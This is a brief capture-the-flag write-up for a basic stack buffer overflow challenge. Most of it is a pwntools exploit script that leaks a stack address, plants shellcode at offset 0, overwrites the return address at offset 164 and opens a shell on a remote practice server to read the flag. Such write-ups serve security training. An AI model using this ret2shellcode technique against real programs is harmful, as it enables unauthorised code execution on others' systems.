root_me_stack_buffer_overflow_basic

Summary

A basic ret2shellcode challenge; the shellcode can be generated directly with pwntools.

EXP

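#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *  # pwncli also provides the pwntools names used below

context.binary = "./root_me_stack_buffer_overflow_basic"
context.log_level = "debug"

io = remote("node4.buuoj.cn", 29064)

# Assembly source of the shellcode, generated by pwntools
sh = shellcraft.sh()

# Round 1: send harmless data and read the dump line that comes back
data = b"aaaa"
io.sendlineafter(b"Give me data to dump:\n", data)
m = io.recvline()
log_ex(f"Get msg: {m}")
# The first 10 characters of the line ("0x" plus 8 hex digits) are the stack address
stack_addr = int16_ex(m[:10])
log_address("stack_addr", stack_addr)
io.sendlineafter(b"Dump again (y/n):\n", b"y")

# Round 2: shellcode at offset 0, leaked stack address at offset 164
data = flat({
    0: asm(sh),
    164: stack_addr
})
io.sendlineafter(b"Give me data to dump:\n", data)
# Answering "n" leaves the dump loop
io.sendlineafter(b"Dump again (y/n):\n", b"n")

io.sendline(b"cat flag")

io.interactive()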
